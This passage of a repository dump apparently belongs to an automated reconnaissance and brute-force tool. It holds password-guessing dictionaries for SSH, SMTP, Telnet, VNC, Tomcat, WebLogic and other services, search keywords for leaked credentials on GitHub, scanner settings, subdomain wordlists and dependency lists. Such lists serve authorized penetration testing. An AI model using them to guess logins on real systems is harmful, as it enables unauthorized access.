19 | %user%!@#
20 | %user%~!@
21 | %user%!@#123
22 | qweasdzxc
23 | %user%2017
24 | %user%2016
25 | %user%2015
26 | %user%@2017
27 | %user%@2016
28 | %user%@2015
29 | admin123
30 | admin888
31 | administrator
32 | administrator123
33 | root123
34 | 123456
35 | password
36 | 12345
37 | 1234
38 | root
39 | 123
40 | qwerty
41 | test
42 | 1q2w3e4r
43 | 1qaz2wsx
44 | qazwsx
45 | 123qwe
46 | 123qaz
47 | 0000
48 | oracle
49 | 1234567
50 | 123456qwerty
51 | password123
52 | 12345678
53 | 1q2w3e
54 | abc123
55 | okmnji
56 | test123
57 | 123456789
58 | q1w2e3r4
59 | user
60 | web
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_smtp.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | Passw0rd
28 | 123456
29 | password
30 | 12345
31 | 1234
32 | root
33 | 123
34 | qwerty
35 | test123
36 | 1q2w3e4r
37 | 1qaz2wsx
38 | qazwsx
39 | 123qwe
40 | 123qaz
41 | 0000
42 | 000000
43 | 88888888
44 | 666666
45 | 111111
46 | oracle
47 | 1234567
48 | 123456qwerty
49 | 12345678
50 | 1q2w3e
51 | abc123
52 | 123456789
53 | q1w2e3r4
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_sqlserver.txt:
--------------------------------------------------------------------------------
1 | sa
2 | 123456
3 | 1qaz@WSX
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_ssh.txt:
--------------------------------------------------------------------------------
1 | Pwd@123
2 | root
3 | root123
4 | 1qaz@WSX
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_svn.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | Passw0rd
28 | 123456
29 | password
30 | 12345
31 | qwerty
32 | test123
33 | 1q2w3e4r
34 | 1qaz2wsx
35 | qazwsx
36 | 123qwe
37 | 123qaz
38 | 000000
39 | 88888888
40 | 666666
41 | 111111
42 | oracle
43 | 1234567
44 | 123456qwerty
45 | 12345678
46 | 1q2w3e
47 | abc123
48 | 123456789
49 | q1w2e3r4
50 |
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_telnet.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | qweasdzxc
28 | Passw0rd
29 | admin
30 | 123456
31 | password
32 | 12345
33 | 1234
34 | root
35 | 123
36 | qwerty
37 | test
38 | 1q2w3e4r
39 | 1qaz2wsx
40 | qazwsx
41 | 123qwe
42 | 123qaz
43 | 0000
44 | 1234567
45 | 123456qwerty
46 | password123
47 | 12345678
48 | 1q2w3e
49 | abc123
50 | okmnji
51 | test123
52 | 123456789
53 | q1w2e3r4
54 | apache
55 | qwer1234
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_tomcat.txt:
--------------------------------------------------------------------------------
1 | admin
2 | tomcat
3 | %user%
4 | %user%123
5 | %user%1234
6 | %user%123456
7 | %user%12345
8 | %user%@123
9 | %user%@123456
10 | %user%@12345
11 | %user%#123
12 | %user%#123456
13 | %user%#12345
14 | %user%_123
15 | %user%_123456
16 | %user%_12345
17 | %user%123!@#
18 | %user%!@#$
19 | %user%!@#
20 | %user%~!@
21 | %user%!@#123
22 | qweasdzxc
23 | %user%2017
24 | %user%2016
25 | %user%2015
26 | %user%@2017
27 | %user%@2016
28 | %user%@2015
29 | Passw0rd
30 | qweasdzxc
31 | admin123
32 | admin888
33 | administrator
34 | administrator123
35 | root123
36 | ftppass
37 | 123456
38 | password
39 | 12345
40 | 1234
41 | root
42 | qwerty
43 | test
44 | 1q2w3e4r
45 | 1qaz2wsx
46 | qazwsx
47 | 123qwe
48 | 123qaz
49 | 0000
50 | oracle
51 | 1234567
52 | 123456qwerty
53 | password123
54 | 12345678
55 | 1q2w3e
56 | abc123
57 | okmnji
58 | test123
59 | 123456789
60 | q1w2e3r4
61 | user
62 | web
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_vnc.txt:
--------------------------------------------------------------------------------
1 | %user%
2 | %user%123
3 | %user%1234
4 | %user%123456
5 | %user%12345
6 | %user%@123
7 | %user%@123456
8 | %user%@12345
9 | %user%#123
10 | %user%#123456
11 | %user%#12345
12 | %user%_123
13 | %user%_123456
14 | %user%_12345
15 | %user%123!@#
16 | %user%!@#$
17 | %user%!@#
18 | %user%~!@
19 | %user%!@#123
20 | qweasdzxc
21 | %user%2017
22 | %user%2016
23 | %user%2015
24 | %user%@2017
25 | %user%@2016
26 | %user%@2015
27 | qweasdzxc
28 | Passw0rd
29 | admin123
30 | admin888
31 | administrator
32 | administrator123
33 | root123
34 | 123456
35 | password
36 | 12345
37 | 1234
38 | root
39 | 123
40 | qwerty
41 | test
42 | 1q2w3e4r
43 | 1qaz2wsx
44 | qazwsx
45 | 123qwe
46 | 123qaz
47 | 0000
48 | oracle
49 | 1234567
50 | 123456qwerty
51 | password123
52 | 12345678
53 | 1q2w3e
54 | abc123
55 | okmnji
56 | test123
57 | 123456789
58 | q1w2e3r4
59 | qwer1234
--------------------------------------------------------------------------------
/iniFile/PwdTxt/dic_password_weblogic.txt:
--------------------------------------------------------------------------------
1 | admin
2 | weblogic
3 | test
4 | %user%
5 | %user%123
6 | %user%1234
7 | %user%123456
8 | %user%12345
9 | %user%@123
10 | %user%@123456
11 | %user%@12345
12 | %user%#123
13 | %user%#123456
14 | %user%#12345
15 | %user%_123
16 | %user%_123456
17 | %user%_12345
18 | %user%123!@#
19 | %user%!@#$
20 | %user%!@#
21 | %user%~!@
22 | %user%!@#123
23 | qweasdzxc
24 | %user%2017
25 | %user%2016
26 | %user%2015
27 | %user%@2017
28 | %user%@2016
29 | %user%@2015
30 | qweasdzxc
31 | Passw0rd
32 | admin123
33 | admin888
34 | administrator
35 | administrator123
36 | root123
37 | 123456
38 | password
39 | 12345
40 | 1234
41 | root
42 | 123
43 | qwerty
44 | test123
45 | 1q2w3e4r
46 | 1qaz2wsx
47 | qazwsx
48 | 123qwe
49 | 123qaz
50 | 0000
51 | oracle
52 | 1234567
53 | 123456qwerty
54 | password123
55 | 12345678
56 | 1q2w3e
57 | abc123
58 | okmnji
59 | test123
60 | 123456789
61 | q1w2e3r4
62 | webadmin
--------------------------------------------------------------------------------
/iniFile/SQLPayloads/blank.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/iniFile/config.ini:
--------------------------------------------------------------------------------
1 | [fofa api]
2 | EMAIL =
3 | KEY =
4 |
5 | [shodan api]
6 | SHODAN_API_KEY =
7 |
8 | [github api]
9 | GITHUB_TOKEN =
10 |
11 | [quake api]
12 | X-QuakeToken =
13 |
14 | [quake nums]
15 | quake_nums = 1000
16 |
17 | [qianxin api]
18 | api-key =
19 | qianxin_nums = 200
20 |
21 | [C nums]
22 | c_nums = 5
23 |
24 | [virustotal api]
25 | VIRUSTOTAL_API =
26 |
27 | [securitytrails api]
28 | Securitytrails_API =
29 |
30 | [censys api]
31 | UID =
32 | SECRET =
33 |
34 | [web ports]
35 | web_ports = ['80-90', 443, 7001, 8000, 8008, 8009, 8080, 8081, 8088, 8090, 8099, 8443, 8800, 8880, 8888, 9000, 9090]
36 |
37 | [service ports dict]
38 | service_ports_dict = {'389': 'ldaps', '1099': 'rmi', '1090': 'rmi', '6379': 'redis', '8000': 'jdwp', '9200': 'elastic', '27017': 'mongodb', '2181': 'zookeeper', '22': 'ssh', '21': 'ftp', '1433': 'mssql', '3306': 'mysql', '3389': 'rdp'}
39 |
40 | [github keywords]
41 | github_keywords = ['jdbc:', 'password', 'username', 'database', 'smtp', 'vpn', 'pwd', 'passwd', 'connect']
42 |
43 | [nuclei config]
44 | nuclei_config = -rl 300 -c 50 -timeout 5 -stats -silent -severity critical,high -as
45 |
46 | # Kuaidaili proxy settings. When using Kuaidaili, set thread_num according to the plan you purchased; switch toggles it: on = use Kuaidaili, off = disabled
47 | [kuaidaili]
48 | tunnel = xxxx.kdltps.com:15818
49 | username = xxxxxxxxx
50 | password = xxxxxxxxx
51 | thread_num = 5
52 | switch = off
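Note: several values here, notably [web ports] and [service ports dict], are Python literals stored as INI strings. A hedged sketch of reading them back (configparser plus ast.literal_eval is an assumption about how the consuming code works, not something this dump confirms):

import ast
import configparser

config = configparser.ConfigParser()
config.read('iniFile/config.ini', encoding='utf-8')

# literal_eval turns the stored Python-literal strings back into real objects.
web_ports = ast.literal_eval(config.get('web ports', 'web_ports'))
service_ports = ast.literal_eval(config.get('service ports dict', 'service_ports_dict'))
use_kuaidaili = config.get('kuaidaili', 'switch') == 'on'

print(web_ports[0], service_ports.get('6379'), use_kuaidaili)  # '80-90' 'redis' False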
--------------------------------------------------------------------------------
/iniFile/dict/dns_servers.txt:
--------------------------------------------------------------------------------
1 | 119.29.29.29
2 | 182.254.116.116
3 | # 223.5.5.5
4 | # 223.6.6.6
5 | 114.114.115.115
6 | 114.114.114.114
7 |
--------------------------------------------------------------------------------
/iniFile/dict/next_sub.txt:
--------------------------------------------------------------------------------
1 | test
2 | test2
3 | t
4 | dev
5 | 1
6 | 2
7 | 3
8 | s1
9 | s2
10 | s3
11 | admin
12 | adm
13 | a
14 | ht
15 | adminht
16 | webht
17 | web
18 | gm
19 | sys
20 | system
21 | manage
22 | manager
23 | mgr
24 | b
25 | c
26 | passport
27 | bata
28 | wei
29 | weixin
30 | wechat
31 | wx
32 | wiki
33 | upload
34 | ftp
35 | pic
36 | jira
37 | zabbix
38 | nagios
39 | bug
40 | bugzilla
41 | sql
42 | mysql
43 | db
44 | stmp
45 | pop
46 | imap
47 | mail
48 | zimbra
49 | exchange
50 | forum
51 | bbs
52 | list
53 | count
54 | counter
55 | img
56 | img01
57 | img02
58 | img03
59 | img04
60 | api
61 | cache
62 | js
63 | css
64 | app
65 | apps
66 | wap
67 | m
68 | sms
69 | zip
70 | monitor
71 | proxy
72 | update
73 | upgrade
74 | stat
75 | stats
76 | data
77 | portal
78 | blog
79 | autodiscover
80 | en
81 | search
82 | so
83 | oa
84 | database
85 | home
86 | sso
87 | help
88 | vip
89 | s
90 | w
91 | down
92 | download
93 | downloads
94 | dl
95 | svn
96 | git
97 | log
98 | staff
99 | vpn
100 | sslvpn
101 | ssh
102 | scanner
103 | sandbox
104 | ldap
105 | lab
106 | go
107 | demo
108 | console
109 | cms
110 | auth
111 | crm
112 | erp
113 | res
114 | static
115 | old
116 | new
117 | beta
118 | image
119 | service
120 | login
121 | 3g
122 | docs
123 | it
124 | e
125 | live
126 | library
127 | files
128 | i
129 | d
130 | cp
131 | connect
132 | gateway
133 | lib
134 | preview
135 | backup
136 | share
137 | status
138 | assets
139 | user
140 | vote
141 | bugs
142 | cas
143 | feedback
144 | id
145 | edm
146 | survey
147 | union
148 | ceshi
149 | dev1
150 | updates
151 | phpmyadmin
152 | pma
153 | edit
154 | master
155 | xml
156 | control
157 | profile
158 | zhidao
159 | tool
160 | toolbox
161 | boss
162 | activity
163 | www
164 |
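Note: this file is the prefix dictionary for subdomain brute forcing, and dns_servers.txt above supplies resolvers. A minimal sketch of combining the two with dnspython (which requirements.txt pulls in); the function and its error handling are illustrative assumptions:

import dns.resolver  # resolver.resolve() needs dnspython >= 2.0 (use .query() on the 1.16 pin)

def brute_prefixes(domain, wordlist='iniFile/dict/next_sub.txt',
                   nameservers=('119.29.29.29', '114.114.114.114')):
    resolver = dns.resolver.Resolver(configure=False)
    resolver.nameservers = list(nameservers)
    found = {}
    with open(wordlist, encoding='utf-8') as fh:
        for prefix in (line.strip() for line in fh if line.strip()):
            fqdn = '{}.{}'.format(prefix, domain)
            try:
                answers = resolver.resolve(fqdn, 'A')
            except Exception:
                continue  # NXDOMAIN, timeouts, etc. are simply skipped here
            found[fqdn] = [rdata.address for rdata in answers]
    return found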
--------------------------------------------------------------------------------
/iniFile/dict/subnames_all_5_letters.txt:
--------------------------------------------------------------------------------
1 | {alphnum}
2 | {alphnum}{alphnum}
3 | {alphnum}{alphnum}{alphnum}
4 | {alphnum}{alphnum}{alphnum}{alphnum}
5 | {alphnum}{alphnum}{alphnum}{alphnum}{alphnum}
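Note: {alphnum} is a pattern token of the kind subbrute-style dictionaries use, standing for one alphanumeric character, so these five lines cover every label of one to five characters. A small sketch of expanding such a pattern, assuming the token means a-z plus 0-9:

import itertools
import string

ALPHNUM = string.ascii_lowercase + string.digits  # assumed alphabet for {alphnum}

def expand_pattern(pattern):
    slots = pattern.count('{alphnum}')
    for combo in itertools.product(ALPHNUM, repeat=slots):
        yield ''.join(combo)

# '{alphnum}{alphnum}' expands to 36 * 36 = 1296 labels; the five-slot line
# alone is 36 ** 5 (about 60 million), which is only practical with a mass
# resolver such as the bundled ksubdomain.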
--------------------------------------------------------------------------------
/iniFile/subdomain3/cdn_servers.txt:
--------------------------------------------------------------------------------
1 | chinacache.net
2 | lxdns.com
3 | fastcdn.cn
4 | globalcdn.cn
5 | lxcdn.com
6 | aicdn.com
7 | cdn20.com
8 | fastwebcdn.com
9 | cloudcdn.net
10 | akamai-staging.net
11 | akamaized.net
12 | akamai.net
13 | cloudfront.net
14 | amazonaws.com
15 | azioncdn.net
16 | cachefly.net
17 | cdn77.net
18 | cdn77.org
19 | cdnetworks.com
20 | gccdn.net
21 | cdnify.io
22 | cdnsun.net
23 | cdnvideo.ru
24 | wscloudcdn.com
25 | edgecastcdn.net
26 | fastly.net
27 | qianxun.com
28 | hwcdn.net
29 | incapdns.net
30 | internapcdn.net
31 | jdcdn.com
32 | kxcdn.com
33 | Leaseweb
34 | lswcdn.net
35 | fpbns.net.
36 | footprint.net
37 | llnwd.net
38 | netdna-cdn.com
39 | ngenix.net
40 | ccgslb.com.cn
41 | mwcloudcdn.com
42 | speedcdns.com
43 | skyparkcdn.net
44 | ourglb0.com
45 | bitgravity.com
46 | azureedge.net
47 | anankecdn.com.br
48 | presscdn.com
49 | telefonica.com
50 | alikunlun.com
51 | ourwebcdn.com
52 | aliyuncs.com
53 | aliyun-inc.com
54 | cdn.dnsv1.com
55 | cdntip.com
56 | alicdn.com
57 | cdn20.info
58 | acadn.com
59 | fastcdn.com
60 | tcdn.qq.com
61 | dayugslb.com
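Note: these are CDN provider domains, presumably matched against a host's CNAME targets to decide whether it sits behind a CDN. A hedged sketch of such a check with dnspython; the function name and the suffix-matching rule are assumptions, not taken from this repository:

import dns.resolver  # dnspython >= 2.0 for resolve()

def looks_like_cdn(hostname, cdn_file='iniFile/subdomain3/cdn_servers.txt'):
    with open(cdn_file, encoding='utf-8') as fh:
        suffixes = [line.strip().lower().rstrip('.') for line in fh if line.strip()]
    try:
        answers = dns.resolver.resolve(hostname, 'CNAME')
    except Exception:
        return False  # no CNAME record, or the lookup failed
    for rdata in answers:
        target = str(rdata.target).rstrip('.').lower()
        if any(target == s or target.endswith('.' + s) for s in suffixes):
            return True
    return False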
--------------------------------------------------------------------------------
/iniFile/subdomain3/name_servers.txt:
--------------------------------------------------------------------------------
1 | 114.114.114.114
2 | 114.114.115.115
3 | 223.5.5.5
4 | 223.6.6.6
5 | 180.76.76.76
6 | 119.29.29.29
7 | 182.254.116.116
8 | 210.2.4.8
9 | 112.124.47.27
10 | 114.215.126.16
11 | 101.226.4.6
12 | 218.30.118.6
13 | 8.8.8.8
14 | 8.8.4.4
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | openpyxl
2 | aiodns
3 | aiohttp
4 | aiosqlite
5 | altgraph
6 | async-timeout
7 | attrs
8 | bcrypt
9 | beautifulsoup4
10 | bs4
11 | certifi
12 | cffi
13 | chardet
14 | Click
15 | click-plugins
16 | cloudscraper
17 | colorama
18 | cryptography
19 | Cython
20 | dnslib
21 | dnspython
22 | elasticsearch
23 | et-xmlfile
24 | Flask
25 | FOFA
26 | geoip2
27 | gevent
28 | google
29 | idna
30 | IPy
31 | itsdangerous
32 | jdcal
33 | Jinja2
34 | kazoo
35 | ldap3
36 | lxml
37 | macholib
38 | MarkupSafe
39 | maxminddb
40 | multidict
41 | netaddr
42 | openpyxl
43 | paramiko
44 | plotly
45 | pyasn1
46 | pycares
47 | pycparser
48 | pycryptodome
49 | PyInstaller
50 | pymongo
51 | PyMySQL
52 | PyNaCl
53 | pyparsing
54 | PySocks
55 | PythonDNS
56 | redis
57 | requests
58 | requests-file
59 | requests-toolbelt
60 | retrying
61 | scapy
62 | shodan
63 | six
64 | soupsieve
65 | termcolor
66 | texttable
67 | tldextract
68 | urllib3
69 | uvloop
70 | Werkzeug
71 | XlsxWriter
72 | xlwt
73 | yarl
74 | PyYAML
75 | tqdm
--------------------------------------------------------------------------------
/requirements2.txt:
--------------------------------------------------------------------------------
1 | openpyxl==2.6.4
2 | aiodns==2.0.0
3 | aiohttp==3.6.2
4 | aiosqlite==0.13.0
5 | altgraph==0.16.1
6 | async-timeout==3.0.1
7 | attrs==20.1.0
8 | bcrypt==3.1.7
9 | beautifulsoup4==4.8.1
10 | bs4==0.0.1
11 | certifi==2019.9.11
12 | cffi==1.13.1
13 | chardet==3.0.4
14 | Click==7.0
15 | click-plugins==1.1.1
16 | cloudscraper==1.2.46
17 | colorama==0.4.1
18 | cryptography==2.8
19 | Cython==0.29.15
20 | dnslib==0.9.10
21 | dnspython==1.16.0
22 | elasticsearch==7.1.0
23 | et-xmlfile==1.0.1
24 | Flask==1.1.1
25 | FOFA==1.0.1
26 | geoip2==4.0.2
27 | gevent
28 | google==2.0.3
29 | idna==2.8
30 | IPy==1.0
31 | itsdangerous==1.1.0
32 | jdcal==1.4.1
33 | Jinja2==2.11.1
34 | kazoo==2.6.1
35 | ldap3==2.6.1
36 | lxml==4.5.1
37 | macholib==1.11
38 | MarkupSafe==1.1.1
39 | maxminddb==2.0.2
40 | multidict==4.7.6
41 | netaddr==0.7.19
42 | openpyxl==2.6.4
43 | paramiko==2.7.1
44 | plotly==4.7.1
45 | pyasn1==0.4.8
46 | pycares==3.1.1
47 | pycparser==2.19
48 | pycryptodome==3.9.2
49 | PyInstaller==3.5
50 | pymongo==3.2
51 | PyMySQL==0.9.3
52 | PyNaCl==1.3.0
53 | pyparsing==2.4.7
54 | PySocks==1.7.1
55 | PythonDNS==0.1
56 | redis==3.3.11
57 | requests==2.24.0
58 | requests-file==1.4.3
59 | requests-toolbelt==0.9.1
60 | retrying==1.3.3
61 | scapy==2.4.3
62 | shodan==1.7.5
63 | six==1.13.0
64 | soupsieve==1.9.5
65 | termcolor==1.1.0
66 | texttable==1.6.2
67 | tldextract==2.2.2
68 | urllib3==1.25.8
69 | uvloop==0.14.0
70 | Werkzeug==1.0.0
71 | XlsxWriter==1.2.5
72 | xlwt==1.3.0
73 | yarl==1.5.1
74 | PyYAML==5.3.1
75 | tqdm==4.51.0
76 |
--------------------------------------------------------------------------------
/versionFlag.txt:
--------------------------------------------------------------------------------
1 | 2021.9.3 Added a Confluence fingerprint
2 | 2021.9.4 Updated Aiqicha collection of the target's corporate structure, including ICP filing records, outbound investments, holding companies, branch offices, contact details, email addresses, and more
3 | 2021.9.5 Added the Quake API; it is called by -d, -c and --fofaTitle
4 | 2021.11.30 Added the Qianxin Hunter API; it is called by -d, -c and --fofaTitle
5 | 2022.1.17 Fixed loose filtering of subdomains returned by the certspotter API
6 | 2022.3.21 Updated the fofa API domain
7 | 2022.3.21 Fixed reverse lookup of domains from ICP filing records
8 | 2022.3.23 Added the securitytrails API for subdomain collection; it is very capable, so adding your API key to config.ini is recommended
9 | 2022.3.23 Fixed Aiqicha returning no data
10 | 2022.7.5 Added the Nuclei default option -as, running Wappalyzer fingerprinting first
11 | 2022.8.12 Added a Dockerfile installation method for ShuiZe
12 | 2022.8.12 Fixed the widely reported aiqicha script errors; the preliminary cause is IP bans
13 | 2022.8.12 Fixed quakeApi errors when no title was returned
14 | 2022.8.20 Integrated ObserverWard fingerprint scanning
--------------------------------------------------------------------------------